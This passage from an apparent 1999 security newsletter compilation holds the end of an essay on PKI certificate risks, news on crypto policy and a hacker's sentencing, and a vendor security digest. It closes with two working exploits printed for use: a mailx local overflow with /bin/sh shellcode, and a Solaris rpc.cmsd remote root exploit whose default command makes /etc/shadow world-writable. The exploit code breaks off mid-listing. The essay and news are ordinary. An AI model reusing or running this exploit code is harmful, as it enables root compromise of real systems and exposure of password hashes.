the verifying computer - the one that uses the certificate. Certificate verification does not use a secret key, only public keys. Therefore, there are no secrets to protect. However, it does use one or more "root" public keys. If the attacker can add his own public key to that list, then he can issue his own certificates, which will be treated exactly like the legitimate certificates. They can even match legitimate certificates in every other field except that they would contain a public key of the attacker instead of the correct one. It doesn't help to hold these root keys in "root certificates." Such a certificate is self-signed and offers no increased security. The only answer is to do all certificate verification on a computer system that is invulnerable to penetration by hostile code or to physical tampering. Risk #4: "Which John Robinson is he?" Certificates generally associate a public key with a name, but few people talk about how useful that association is. Imagine that you receive the certificate of John Robinson. You may know only one John Robinson personally, but how many does the CA know? How do you find out if the particular John Robinson certificate you received is your friend's certificate? You could have received his public key in person or verified it in person (PGP allows this), but more likely you received a certificate in e-mail and are simply trusting that it is the correct John Robinson. The certificate's Common Name will probably be extended with some other information, in order to make it unique among names issued by that one CA. Do you know that other information about your friend? Do you know what CA his certificate should come from? When Diffie and Hellman introduced public-key cryptography, they proposed a modified telephone directory in which you could find public keys. Instead of name, address, and phone number, it would have name, address, and public key. If you wanted to find John Robinson's public key you would look him up in the directory, get his public key and send him a message for his eyes only using that public key. This might have worked with the Stanford Computer Science Department phone directory in 1976, but how many John Robinsons are in the New York City phone book, much less in a hypothetical phone book for the global Internet? We grow up in small families where names work as identifiers. By the time we're 5 years old, we know that lesson. Names work. That is false in the bigger world, but things we learn as toddlers we never forget. In this case, we need to think carefully about names and not blindly accept their value by the 5-year-old's lessons locked into our memories. Risk #5: "Is the CA an authority?" The CA may be an authority on making certificates, but is it an authority on what the certificate contains? For example, an SSL server certificate contains two pieces of data of potential security interest: the name of the keyholder (usually a corporate name) and the DNS name for the server. There are authorities on DNS name assignments, but none of the SSL CAs listed in the popular browsers is such an authority. That means that the DNS name in the certificate is not an authoritative statement. There are authorities on corporate names. These names need to be registered when one gets a business license. However, none of the SSL CAs listed in the browsers is such an authority. In addition, when some server holds an SSL server certificate, it has permission to do SSL. Who granted the authority to an SSL CA to control that permission? Is the control of that permission even necessary? It serves an economic purpose (generating an income stream for CAs) but does it serve a security purpose? What harm is done if an uncertified server were allowed to use encryption? None. Risk #6: "Is the user part of the security design?" Does the application using certificates take the user into account or does it concern itself only with cryptography? For example, a normal user makes a decision of whether to shop with a given SSL-protected Web page based on what is displayed on that page. The certificate is not displayed and does not necessarily have a relation to what is displayed. SSL security does not have the ability to control or even react to the content of the Web page, only its DNS address. The corporate name is not compared to anything the user sees and there are some Web pages whose certificate is for a company that does Web hosting, not for the company whose logo appears on the displayed page. Users can't, and can't be expected to, sort this all out. Risk #7: "Was it one CA or a CA plus a Registration Authority?" Some CAs, in response to the fact that they are not authorities on the certificate contents, have created a two-part certification structure: a Registration Authority (RA), run by the authority on the contents, in secure communication with the CA that just issues certificates. Other vendors sell CA machinery directly to the content authority. The RA+CA model is categorically less secure than a system with a CA at the authority's desk. The RA+CA model allows some entity (the CA) that is not an authority on the contents to forge a certificate with that contents. Of course, the CA would sign a contract promising not to do so, but that does not remove the capability. Meanwhile, since security of a chain is weaker than the weakest link, the RA+CA is less secure than either the RA or the CA, no matter how strong the CA or how good the contract with the CA. Of course, the model with a CA at the authority's desk (not at the vendor's site) violates some PKI vendors' business models. It's harder to charge for certificates when you sell someone the CA code (or they get it for free, as Open Source). Risk #8: "How did the CA identify the certificate holder?" Whether a certificate holds just an identifier or some specific authorization, the CA needs to identify the applicant before issuing the certificate. There was a credit bureau that thought they would get into the CA business. After all, they had a vast database on people, so, the thinking ran, they should be able to establish someone's identity online with ease. If you want to establish identity online, you can do that provided you have a shared secret with the subject and a secure channel over which to reveal that secret. SSL provides the secure channel. The trouble with a credit bureau serving this role is that in their vast database there is not one secret shared with the subject. This is because credit bureaus are in the business of selling their information to people other than the subject. Worse, because credit bureaus do such a good job at collecting and selling facts about people, others who might have information about a subject are probably hard pressed to find any datum shared with the subject that is not already available through some credit bureau. This puts at risk commercial CAs that use credit bureau information to verify identity on-line; the model just doesn't work. Meanwhile, having identified the applicant somehow, how did the CA verify that the applicant really controlled the private key corresponding to the public key being certified? Some CAs don't even consider that to be part of the application process. Others might demand that the applicant sign some challenge right there on the spot, while the CA watches. Risk #9: "How secure are the certificate practices?" Certificates aren't like some magic security elixir, where you can just add a drop to your system and it will become secure. Certificates must be used properly if you want security. Are these practices designed with solid security reasons, or are they just rituals or imitations of the behavior of someone else? Many such practices and even parts of some standards are just imitations which, when carefully traced back, started out as arbitrary choices by people who didn't try to get a real answer. How is key lifetime computed? Does the vendor use 1 year, just because that's common? A key has a cryptographic lifetime. It also has a theft lifetime, as a function of the vulnerability of the subsystem storing it, the rate of physical and network exposure, attractiveness of the key to an attacker, etc. From these, one can compute the probability of loss of key as a function of time and usage. Does the vendor do that computation? What probability threshold is used to consider a key invalid? Does the vendor support certificate or key revocation? Certificate Revocation Lists (CRLs) are built into some certificate standards, but many implementations avoid them because they seem to be archaic remnants of the newsprint booklets of bad checking account numbers one used to find at the supermarket checkout stand. Like those booklets, CRLs are seen as too big and too outdated to be relevant. However, if CRLs are not used, how is revocation handled? If revocation is handled, how is compromise of a key detected in order to trigger that revocation? Can revocation be retroactive? That is, can a certificate holder deny having made some signature in the past? If so, are signatures dated so that one knows good signatures from suspect ones? Is that dating done by a secure timestamp service? How long are the generated public keys and why was that length chosen? Does the vendor support 512-bit RSA keys just because they're fast or 2048-bit keys because someone over there in the corner said he thought it was secure? Does the proper use of these certificates require user actions? Do users perform those actions? For example, when you establish an SSL connection with your browser, there's a visual indication that the SSL protocol worked and the link is encrypted. But who are you talking securely with? Unless you take the time to read the certificate that you received, you don't know. Even then, you may not know (cf., Risk #4, above) but if you don't even look, it's much like going into a private room with the lights off: you might know that someone else is there and your conversation is private, but until you know who that other person is, you shouldn't reveal any secret information. Risk #10: "Why are we using the CA process, anyway?" One PKI vendor employee confided in us a few years ago that they had great success selling their PKI solution, but that customers were still unhappy. After the CA was installed and all employees had been issued certificates, the customer turned to the PKI vendor and asked, "OK, how do we do single sign-on?" The answer was, "You don't. That requires a massive change in the underlying system software." Single Sign-On (SSO) might be the killer app of PKI. Under SSO, you come into work in the morning, plug in your smart-card, enter the PIN that activates it, and for the rest of the day, you don't have to do any more logins. All of that is handled for you by the SSO mechanism. Attractive isn't it? Of course, it's attractive. Authentication is a pain. Anything we can do to avoid it, we'll jump at. Unfortunately, the security value of authentication is all but completely defeated by SSO. Authentication is supposed to prove that the user is present at the controlling computer, at the time of the test. Under SSO, when the user has to rush to the washroom, any passing person can walk up to that user's computer and sign on someplace via the SSO mechanism. So, why are so many jumping at the CA process with such fervor? Do they use certificates out of empty ritual, just because the other guy does and it's the thing to do this year? Do they do it in order to pass the liability buck: to be able to blame the PKI experts if any insecurity sneaks through? We are not that cynical. Our assessment is that security is very difficult, both to understand and to implement. Busy system administrators and IT managers don't have the time to really understand security. They read the trade press. The trade press, influenced by PKI vendors, sings the praises of PKIs. And PKI vendors know what busy people need: a minimal-impact solution. "Here, buy this one thing and it will make you secure." So that's what they offer. Reality falls far short of this promise, but then, this is a business and the prominent voices are those with something to sell. Caveat emptor. Bruce Schneier is the author of Applied Cryptography, the Blowfish and Twofish encryption algorithms, and dozens of research papers and articles on cryptography and computer security. He is CTO of Counterpane Internet Security, Inc., a managed security service company offering leading-edge expertise in the fields of intrusion detection and prevention, preemptive threat discovery, forensic research, and organizational IT systems analysis. You can subscribe to his free monthly e-mail newsletter, Crypto-Gram, at http://www.counterpane.com Carl M. Ellison is a Senior Security Architect for Intel Corporation, with special focus on cryptography, cryptographic access control and public key certificates. Prior to the focus on cryptography, his earlier professional computer science career focused on system design with special emphasis on distributed and networked systems. ISN is sponsored by Security-Focus.COM @HWA 35.0 [ISN] Forbes says he'll ditch all crypto export controls ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Forwarded From: Declan McCullagh http://www.wired.com/news/politics/0,1283,33049,00.html Forbes, the Privacy Candidate by Declan McCullagh (declan@wired.com) 11:40 a.m. 17.Dec.1999 PST WASHINGTON -- If you're the kind of person who frets about ever-eroding privacy rights, Steve Forbes wants to be your president. In the first campaign speech by any presidential candidate on the topic, the publishing luminary left nothing to the imagination: Voracious databases know more about you than your mother does, and the Clinton administration is particularly to blame. "Bit by bit, day by day, we are being seduced by politicians promising security as they take away our sovereignty, promising prosperity as they gnaw away at our privacy," Forbes told a crowd at the conservative Free Congress Foundation on Thursday afternoon. Hearing someone grouse about Bill Clinton and Al Gore at a Free Congress Foundation event is about as remarkable as a Macy's post-holiday sale, but Forbes' plan to muzzle federal infocrats is one that even the ACLU can cheer. [...] Much of Forbes' speech was devoted to how the executive branch is "engaged in the greatest assault" on privacy in the history of the United States, a claim the Clinton administration dismissed on Friday as campaign hyperbole. [...] ISN is sponsored by Security-Focus.COM @HWA 36.0 [ISN] Zyklon claims his crime was "no big deal" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.techserver.com/noframes/story/0,2294,500060584-500100049-500415296-0,00.html WASHINGTON (November 22, 1999 8:10 p.m. EST http://www.nandotimes.com) - At age 19, hacker Eric Burns has already wandered the underpinnings of the Web where few had gone before, including an illicit visit inside computers at the White House in May. "I didn't really think it was too much of a big deal," said Burns - hacker name Zyklon - who admitted responsibility for some of the most sensational attacks on corporate and government Internet sites. Burns pleaded guilty Friday in U.S. District Court in Alexandria, Va., to a single felony count of intentionally hacking into one computer, but admitted involvement in the spate of electronic assaults. Now Burns is facing 15 months in federal prison and $36,240 in restitution. And under a judge's orders last week, he won't be allowed to touch a computer for three years after his release. Burns was initially indicted May 13 on charges of breaking into computers for the U.S. Information Agency and two businesses. That was four days after the White House Internet site - at www.whitehouse.gov - was electronically assaulted. Initially, Burns said he wasn't directly involved in that White House attack in which the altered site included the phrase, "following peeps get some shouts" - hacker slang for "hello" - and listed a dozen names, including Zyklon. Zyklon is the name of a poison gas used by Nazis against Jews. But federal prosecutors said Burns boasted of the White House attack online even before it happened, and Burns admitted at his sentencing Friday he was among three people who altered the site briefly to show a black Web page with the names of hacker organizations, along with messages, "Your box was own3d," and, "Stop all the war." He said Monday in a telephone interview from his home in Shorewood, Wash., that he will refuse to identify his two partners to the Secret Service, partly because he believes the criminal penalties for hackers are too steep. His punishment didn't fit his crime, he insisted. "I'd rather not have what happened to me happen to anyone else," Burns said. "I don't really agree with the kind of sentencing range there is for the crime." The seriousness of the trouble facing Burns didn't sink in, he admitted, even after FBI agents raided his home and took his computer. "I just gave them a confession," Burns said. "I didn't think it was too big a deal." Prosecutors indicated otherwise. U.S. Attorney Helen Fahey said Burns attacked computers on the Internet controlling Web sites for NATO, a U.S. embassy and consulates and even Vice President Al Gore. The USIA Web site was shut down for eight days after Burns' attack. All told, the attacks cost the government and businesses more than $40,000, prosecutors said. When the White House site was vandalized, experts "had to shut down the Web server, disconnect both the public and private computer networks from the Internet for two days and reconfigure the computer system," Fahey said in a statement. Burns expects to report to federal prison in four to six weeks, which he hopes will let him spend Thanksgiving and the holidays with his family. With time off for good behavior, his lawyer told him he might spend as few as 13 months behind bars. Although his sentence says he won't be allowed to use a computer during three years of supervised probation when he's released, he's already planning to ask his probation officer whether he'll be allowed to use one for work. "I really don't know" how the arrest and time in prison will affect his future, Burns said. "Hopefully, it won't impact it too bad." == Some day, on the corporate balance sheet, there will be an entry which reads, "Information"; for in most cases the information is more valuable than the hardware which processes it. -- Adm. Grace Murray Hopper, USN Ret. == http://www.dis.org/erehwon/ ISN is sponsored by Security-Focus.COM @HWA 37.0 [ISN] Security Wire Digest Volume 1 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From: infosecurity@emailch.com SECURITY WIRE DIGEST, VOL. 1, NO. 8, NOV. 22, 1999 Security Wire Digest is a weekly e-mail newsletter brought to you by Information Security magazine, an ICSA.net publication. TO UNSUBSCRIBE, REFER TO THE INSTRUCTIONS AT THE END OF THIS MESSAGE. ===================================================== CONTENTS **THANKSGIVING NOTICE** 1. INFOSEC WEEK IN REVIEW *Enterprise Security Management a Hot Topic at CSI 2. INDUSTRY BRIEFS *HP VirtualVault 4.0 Goes Mainstream *eNABLE Supports Rainbow and RSA *Celo Debuts CeloCom VPN Suite *RSA Joins Trusted Computing Platform Alliance *Entegrity Partners With Identrus *Schlumberger Introduces Easyflex Corporate *Identix BioLogon Available Online *Tumbleweed Acquires Worldtalk 3. HAPPENINGS 4. SECURITY PERSPECTIVES *Exposing Hacking With Hacking Exposed By Ben Rothke ===================================================== THIS ISSUE OF SECURITY WIRE DIGEST IS SPONSORED BY... Agilent Technology SFProtect NT Security Scanner SFProtect NT Security Scanner is the ONE software solution that empowers you to find and fix NT vulnerabilities with one single application. How? SFProtect scans the NT operation system, IIS and SQL version 6.5 and 7.0 for security vulnerabilities. Once identified, problems can be fixed with SFProtect's unique Intellifix feature. You can also get e-mail notification of audit results, reports in HTML, remote operation through a secure ODBC link and more. Download your free trial version today: http://www.agilent.com/comms/netsecurity9 ===================================================== **THANKSGIVING NOTICE** Security Wire Digest will take a one-issue hiatus next week due to U.S. Thanksgiving festivities. The next Security Wire Digest will be delivered on Monday, Dec. 6. ===================================================== 1. INFOSEC WEEK IN REVIEW *ENTERPRISE SECURITY ADMINISTRATION A HOT TOPIC AT CSI Easing the burdens of security administration is on the minds of lots of security practitioners these days. As organizations introduce new technologies and services to network infrastructures, security admins and managers are faced with the complex task of not only finding and fixing new vulnerabilities before they are exploited, but identifying and responding to breaches after they've already occurred. Last week at CSI's annual security conference, a number of vendors introduced new tools and enhancements to existing products that respond to this need by automating, centralizing and simplifying the task of enterprise risk management and intrusion response. BindView Development Corp. (http://www.bindview.corp) announced version 2.0 of its HackerShield software, an enterprise vulnerability scanner that allows operators to find and close security holes in servers, workstations and network devices across a heterogeneous network. Available in December, version 2.0 is engineered with the increasing number of security newbies in mind; while its database of vulnerability scripts is as extensive as that of other enterprise-class scanners, the tool deploys fast and is easy to configure and use. It includes a handy Scan Wizard that walks new users through the first-time scanning process, and when a vulnerability or breach is identified, it uses plain language to spell out the degree of risk and appropriate response procedures. BMC Software (http://www.bmc.com) rolled out an enhancement to its CONTROL-SA security suite that extends the reach of its centralized management offering. CONTROL-SA/Links allows admins and managers to create event definitions and automated rulesets for disparate parts of the enterprise network. For instance, security managers can integrate human resource applications within the security administration process. If a new employee joins the organization, CONTROL-SA/Links can be directed to intercept certain HR transactions and automatically initiate end-user rights for the new employee. By year-end, newcomer e-Security (http://www.esecurityinc.com) plans to introduce a "Management Desk" to its Open e-Security Platform (OeSP) to help operators respond to identified security breaches. OeSP's competitive differentiator is that it consolidates reports of security "exceptions" in real-time from fragmented security products -- no matter the product brand. When the central console receives notice of an intrusion, the Management Desk will automatically generate a step-by-step response outline according to the organization's predefined security policy, contact appropriate personnel and monitor security response procedures. Version 5.5 of Network Associates's (http://www.nai.com) CyberCop vulnerability scanner also automates several administrative tasks. Its AutoFix feature automatically repairs more than 700 identified network, protocol and application vulnerabilities, and its AutoUpdate feature lets admins update the scanning engine and vulnerability database on a regular, automatic basis. Computer Associates (http://www.cai.com) announced an access control enhancement to its eTrust family of security tools. With the simultaneous release of eTrust Access Control 5.0 for UNIX and eTrust Access Control 4.1 for NT, CA provides users with a centralized system for creating, distributing and managing access. The tools also operate within CA's flagship enterprise management system, Unicenter TNG. Finally, BullSoft (http://www.bullsoft.com) announced that it has integrated storage management capabilities into its OpenMaster secure e-infrastructure and enterprise management software. The added capability allows organizations to select and configure best-of-breed Internet and enterprise-wide storage resources, and manage all them from a centralized OpenMaster console.OpenMaster storage management configuration starts at $18,900, which includes core services such as network monitoring, alarm management and network discovery. ===================================================== 2. INDUSTRY BRIEFS *HP VIRTUALVAULT 4.0 GOES MAINSTREAM Hewlett-Packard last week announced major enhancements and new pricing to its Praesidium VirtualVault 4.0 trusted Web-server platform. The latest version of VirtualVault provides application-level protection for such b-to-b applications as SAP, Oracle and Ariba; and supports a broader range of enterprise server platforms, including Sun, Microsoft, Compaq and IBM. Optional BMC Software Patrol SafePassage for VirtualVault simplifies the deployment of secure extranets. Entry-level price for VirtualVault is now $17,500. http://www.hp.com/security *eNABLE SUPPORTS RAINBOW AND RSA eNABLE Solutions and Rainbow Technologies will develop an integrated solution that combines enRole, eNABLE's e-business access management system, with iKey, Rainbow's USB authentication device, providing end-users with two-factor hardware authentication in a scalable solution. In related news, eNABLE announced that it has enhanced enRole to provide support for RSA ACE/Server authentication management software from RSA Security. http://www.enablesolutions.com http://www.rainbow.com http://www.rsasecurity.com *CELO DEBUTS CELOCOM VPN SUITE Fully integrated with Celo Communications's PKI technology, the CeloCom VPN suite offers authentication, encryption and full X.509 and LDAP compliance. The suite can be integrated into existing networks and can interoperate with other VPN products, certificate management systems, smart cards and readers, and LDAP directory services. The suite is comprised of four CeloCom products: CeloCom Secure remote access, CeloCom RVPN and CeloCom LVPN remote VPN clients, and CeloCom GateKeeper remote access server. http://www.celocom.com *RSA JOINS TRUSTED COMPUTING PLATFORM ALLIANCE RSA Security Inc. joined the Trusted Computing Platform Alliance (TCPA), an industry group whose goal is to establish a new hardware and software specification that technology companies can use to offer more trusted and secure personal computers for conducting e-business. RSA Security will work alongside founding members Compaq, HP, IBM, Intel and Microsoft to simplify the RSA deployment, use and manageability of SecurID technologies by enhancing and standardizing security at the level of the platform hardware, BIOS and operating system. http://www.rsasecurity.com *ENTEGRITY PARTNERS WITH IDENTRUS Secure e-business applications provider Entegrity Solutions has announced an agreement with the Identrus alliance to develop enterprise-ready solutions based on the Identrus trust model that meet Identrus specifications for global e-commerce interoperability and security. Using cryptography and PKI technology, Entegrity will work with Identrus-member financial institutions and solution providers to "trust-enable" standard, legacy and custom applications used for b-to-b e-commerce. Identrus members now represent 11 global financial institutions in more than 100 countries with more than 8 million business relationships. http://www.entegrity.com http://www.identrus.com *SCHLUMBERGER INTRODUCES EASYFLEX CORPORATE In order to meet the growing security concerns of the corporate market, Schlumberger has introduced Easyflex Corporate, a new dual-interface contact/contactless smart card that facilitates secure access to the real and virtual desktop. The card controls physical access to offices, buildings and parking lots through its contactless interface, as well as logical access to computers, servers and networks through its secure contact interface. http://www.smartcards.com *IDENTIX BIOLOGON AVAILABLE ONLINE Biometric security provider Identix last week made its BioLogon network security fingerprint identification software and hardware available as a new product at Beyond.com's Web site. Visitors to Beyond.com can download the BioLogon fingerprint identification suite, and obtain biometric hardware readers in multiple options. http://www.beyond.com http://www.identix.com *TUMBLEWEED ACQUIRES WORLDTALK Secure messaging provider Tumbleweed Communications Corp. last week announced a definitive agreement to acquire Worldtalk Corp. When combined with Worldtalk's WorldSecure e-mail content filtering products, Tumbleweed's Integrated Messaging Exchange (IME) will enable customers to centrally define and enforce policies that drive new traffic across IME. Worldtalk will become a wholly owned subsidiary of Tumbleweed. The transaction is expected to close in the first quarter of 2000. Terms were not released. http://www.tumbleweed.com http://www.worldtalk.com ===================================================== 3. HAPPENINGS Cards on the 'Net -- Smart Cards and ID Technology: Unlocking the Commercial Potential of the Web Tu-Th, Nov. 30-Dec. 2, San Francisco, Calif. http://www.ctst.com DECEMBER IT Solutions & Information Assurance Conference W, Dec. 1, Los Angeles, Calif. W & Th, Dec. 8 & 9, Colorado Springs, Colo. http://www.technologyforums.com 18th Annual Data Center Conference: Taking the Data Center to E-business and Beyond W-F, Dec. 1-3, Orlando, Fla. http://www.gartner.com 15th Annual Computer Security Applications Conference M-F, Dec. 6-10, Phoenix, Ariz. http://www.acsac.org Web and Intranet Security T-Th, Dec. 7-9 Orlando, Fla. http://www.misti.com Web and Intranet Security T-Th, Dec. 7-9 Orlando, Fla. http://www.misti.com SANS Security San Francisco S-Th, Dec. 11-16, San Francisco, Calif. http://www.sans.org/sf99/sf99.htm Extranet Security M-W, Dec. 13-15 San Francisco, Calif. http://www.unex.berkeley.edu/eng ===================================================== 4. SECURITY PERSPECTIVES *EXPOSING HACKING WITH HACKING EXPOSED By Ben Rothke Do books about hacking create more hackers? Is corporate America at risk due to such titles? Many people in the computer industry feel that such dissemination of information is a sure way to increase computer malevolence. The question has been re-ignited with the publication of Hacking Exposed: Network Security Secrets and Solutions, by Stuart McClure, Joel Scambray and George Kurtz, all formerly with Ernst & Young's e-security group. Are such titles simply cookbooks for those attempting to perform computer crimes? The knee-jerk answer might be yes, but in reality, the answer is a clear no. As an example, will the reader of Adventures in the Kitchen by Wolfgang Puck emerge as a gourmet chef, or will the reader of Dr. Atkins's New Diet Revolution lose weight by reading the book? While the written word is powerful, and Hacking Exposed is indeed a powerful book, there is no way for a book to instantaneously turn a novice into a dangerous hacker. While a preponderance of corporate systems are indeed insecure, it is irresponsible and capricious to think that the mere appearance of a book such as Hacking Exposed will create a landslide of hacker activity. Such an allegation is simply an attempt to transfer corporate America's apathy towards information security, and apply a quick blame to a much larger problem. Anyone who views hacking as an exercise in reading a book does not understand hacking, nor the nature of securing computer systems. True, the book lists tools and exercises that will make a hacking exercise easier. But to perform a real hack is something that takes more than the book has to offer. The authors state something to the effect of, "hacking root is a state of mind." With such a mantra, the true hacker will know that running a few handy tools or scripts will only provide them with a start to their hacking endeavor. When the tools fail, where will they go on? If not their own fortitude, their own quest for root, a quest that can not be found in any book, then the hacking attempt will quickly end there. Want to know a secret? Contrary to the movies and CNN reports, hacking is a pretty boring exercise. Just as a novice hunter will tire after a short while, so too will a script kiddie wear down easily. For the novice hacker, the appearance of a book about hacking will neither help nor hinder his aspirations. Traversing through networks, servers and myriad hosts is tedious at best for the greenhorn. It is only the media and uninitiated who attempt to glamorize such activities. Hacking Exposed is an important title for those who are interested in securing their systems, and know what the innumerable vulnerabilities within their systems are. Will such a title unleash a new wave of hackers? No. Ben Rothke (brothke@ebnetworks.com) is a network security consultant with eB Networks Inc. ===================================================== ADVERTISEMENT ICSA.net announces a free Webcast, "An Overview of Intrusion Detection Technologies," to air on Dec. 9, 1999. This one-hour seminar will explain intrusion detection and vulnerability assessment in clear terms, as well as announce the new ICSA Intrusion Detection Buyers' Guide, an online resource for decision-makers. For details, visit http://www.icsa.net. ===================================================== Security Wire Digest and Information Security magazine are published by ICSA.net, the world's leader in Internet Security services. Copyright (c) 1999. All rights reserved. No portion of this newsletter may be redistributed or republished in any format without the express consent of the publisher. ===================================================== To SUBSCRIBE to Security Wire Digest, go to: http://www.infosecuritymag.com/newsletter To UNSUBSCRIBE to Security Wire Digest, go to: http://custserv.emailch.com/removeme/unsub.cfm?j=11887&e=jericho@dimensional.com To CHANGE your e-mail address, go to: http://polaris.emailch.com/infosecurity/questionnaire.cfm?e=jericho@dimensional.com .. email integration by EmailChannel, Inc. For more information, send email to info@emailch.com or please visit http://www.emailch.com ISN is sponsored by Security-Focus.COM @HWA 38.0 mailx.c slackware 3.6 local exploit ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ /* I dunno if this is an old overflow or (it probably is...) but I was just messing with the Slackware 3.6 source and found it. Here's some basic notes on what happens: $HOME environment dir contains exploit. Exploit buffer size = 1024 + 8 tinit() is called first. This gets the homedir variable from cp which is a value returned by getenv("HOME"); load() is called next, taking as an argument an expended "~/.mailrc". expand(): if (name[0] == '~' && (name[1] == '/' || name[1] == '\0')) { sprintf(xname, "%s%s", homedir, name + 1); xname size = 1024 homedir == getenv("HOME") name == "~/.mailrc" "~/.mailrc" is at end of the buffer, so this should just be pushed over the stack and forgotten about. */ /* * mailx buffer overflow * */ #include #include #define BSIZE (1024) #define OSIZE (8) #define ESIZE (BSIZE + OSIZE) #define NOP (0x90) #define OFFSET (0) char hellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; long get_esp (void) { __asm__ ("movl %esp, %eax"); } int main (int argc, char * * argv) { char * evil; int i, j; long addr; int offset = OFFSET; evil = (char *)malloc(ESIZE); for (i = 0; i < (ESIZE - strlen(hellcode) - 4); ++i) evil[i] = NOP; for (j = 0; i < (ESIZE - 4); ++i, ++j) evil[i] = hellcode[j]; if (argc > 1) offset = atoi(argv[1]); addr = (get_esp() - offset); *(long *)(evil + i) = addr; setenv("HOME", evil, 1); fprintf(stderr, "\nmailx-8.1.1 exploit\n"); fprintf(stderr, "Using address 0x%x, offset %d\n\n", addr, offset); execl("/usr/bin/mail", "mail", NULL); } /* www.hack.co.za */ @HWA 39.0 cmsdex.c Solaris (2.6 / 7.0) remote exploit. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ /* * cmsdex - i386 Solaris remote root exploit for /usr/dt/bin/rpc.cmsd * * Tested and confirmed under Solaris 2.6 and 7.0 (i386) * * Usage: % cmsdex -h hostname -c command -s sp -o offset * * where hostname is the hostname of the machine running the vulnerable * CDE calendar service, command is the command to run as root on the * vulnerable machine, sp is the %esp stack pointer value, and offset * is the number of bytes to add to sp to calculate your target %eip * (try -1000 to 1000 in increments of 10 or so for starters once you * have a good guess at the stack pointer). * * When specifying a command, be sure to pass it to the exploit as a * single argument, namely enclose the command string in quotes if it * contains spaces or other special shell delimiter characters. The * command string must not be longer than 100 bytes. The exploit will * pass this string without modification to /bin/sh -c on the remote * machine, so any normally allowed Bourne shell syntax is also allowed * in the command string. Due to the nature of the exploit, the command * string must not contain any @ characters. * * Demonstration values for i386 Solaris: * * (2.6) cmsdex -h host.example.com -c "touch /0wn3d" -s 0x0804748c -o 0 * (7.0) cmsdex -h host.example.com -c "touch /0wn3d" -s 0x08047378 -o 0 * * June 4, 1999 */ #include #include #include #include #include #define CMSD_PROG 100068 #define CMSD_VERS 4 #define CMSD_PROC 21 #define EGGLEN 1036 #define JUGULAR 1024 #define NOP 0x90 char shell[] = /* 0 */ "\xeb\x3d" /* jmp springboard */ /* syscall: */ /* 2 */ "\x9a\xff\xff\xff\xff\x07\xff" /* lcall 0x7,0x0 */ /* 9 */ "\xc3" /* ret */ /* start: */ /* 10 */ "\x5e" /* popl %esi */ /* 11 */ "\x31\xc0" /* xor %eax,%eax */ /* 13 */ "\x89\x46\xbf" /* movl %eax,-0x41(%esi) */ /* 16 */ "\x88\x46\xc4" /* movb %al,-0x3c(%esi) */ /* 19 */ "\x89\x46\x0c" /* movl %eax,0xc(%esi) */ /* 22 */ "\x88\x46\x17" /* movb %al,0x17(%esi) */ /* 25 */ "\x88\x46\x1a" /* movb %al,0x1a(%esi) */ /* 28 */ "\x88\x46\xff" /* movb %al,0x??(%esi) */ /* execve: */ /* 31 */ "\x31\xc0" /* xor %eax,%eax */ /* 33 */ "\x50" /* pushl %eax */ /* 34 */ "\x56" /* pushl %esi */ /* 35 */ "\x8d\x5e\x10" /* leal 0x10(%esi),%ebx */ /* 38 */ "\x89\x1e" /* movl %ebx,(%esi) */ /* 40 */ "\x53" /* pushl %ebx */ /* 41 */ "\x8d\x5e\x18" /* leal 0x18(%esi),%ebx */ /* 44 */ "\x89\x5e\x04" /* movl %ebx,0x4(%esi) */ /* 47 */ "\x8d\x5e\x1b" /* leal 0x1b(%esi),%ebx */ /* 50 */ "\x89\x5e\x08" /* movl %ebx,0x8(%esi) */ /* 53 */ "\xb0\x3b" /* movb $0x3b,%al */ /* 55 */ "\xe8\xc6\xff\xff\xff" /* call syscall */ /* 60 */ "\x83\xc4\x0c" /* addl $0xc,%esp */ /* springboard: */ /* 63 */ "\xe8\xc6\xff\xff\xff" /* call start */ /* data: */ /* 68 */ "\xff\xff\xff\xff" /* DATA */ /* 72 */ "\xff\xff\xff\xff" /* DATA */ /* 76 */ "\xff\xff\xff\xff" /* DATA */ /* 80 */ "\xff\xff\xff\xff" /* DATA */ /* 84 */ "\x2f\x62\x69\x6e\x2f\x73\x68\xff" /* DATA */ /* 92 */ "\x2d\x63\xff"; /* DATA */ extern char *optarg; struct cm_send { char *s1; char *s2; }; struct cm_reply { int i; }; bool_t xdr_cm_send(XDR *xdrs, struct cm_send *objp) { if (!xdr_wrapstring(xdrs, &objp->s1)) return (FALSE); if (!xdr_wrapstring(xdrs, &objp->s2)) return (FALSE); return (TRUE); } bool_t xdr_cm_reply(XDR *xdrs, struct cm_reply *objp) { if (!xdr_int(xdrs, &objp->i)) return (FALSE); return (TRUE); } int main(int argc, char *argv[]) { int c, slen, clen; char *program, *hostname, *command, egg[EGGLEN+1], *eggp; unsigned long int sp = 0, addr, alen = 16; long int offset = 0; CLIENT *cl; struct cm_send send; struct cm_reply reply; struct timeval tm = { 10, 0 }; enum clnt_stat stat; program = argv[0]; hostname = "localhost"; command = "chmod 666 /etc/shadow"; while ((c = getopt(argc, argv, "h:c:s:o:a:")) != EOF) { switch (c) { case 'h': hostname = optarg; break; case 'c': command = optarg; break; case 's': sp = strtoul(optarg, NULL, 0); break; case 'o': offset = strtol(optarg, NULL, 0); break; case 'a': alen = strtoul(optarg, NULL, 0); break; case '?': default: printf("usage: %s -h hostname -c command -s sp -o offset\n", program); exit(1); break; } } slen = strlen(shell); clen = strlen(command); if (clen > 100) { printf("exploit failed; command string too long " "(must not exceed 100 characters)\n"); exit(1); } shell[30] = (char) (clen + 27); memset(egg, NOP, EGGLEN); eggp = egg + EGGLEN - alen - 1 - clen - slen; memcpy(eggp, shell, slen); eggp += slen; memcpy(eggp, command, clen); eggp += clen; *eggp++ = '\xff'; addr = sp + offset; while (eggp <= egg + EGGLEN - 4) { *eggp++ = (addr >> 0) & 0xff; *eggp++ = (addr >> 8) & 0xff; *eggp++ = (addr >> 16) & 0xff; *eggp++ = (addr >> 24) & 0xff; } egg[JUGULAR] = '\xff'; egg[EGGLEN] = '\0'; send.s1 = egg; send.s2 = ""; cl = clnt_create(hostname, 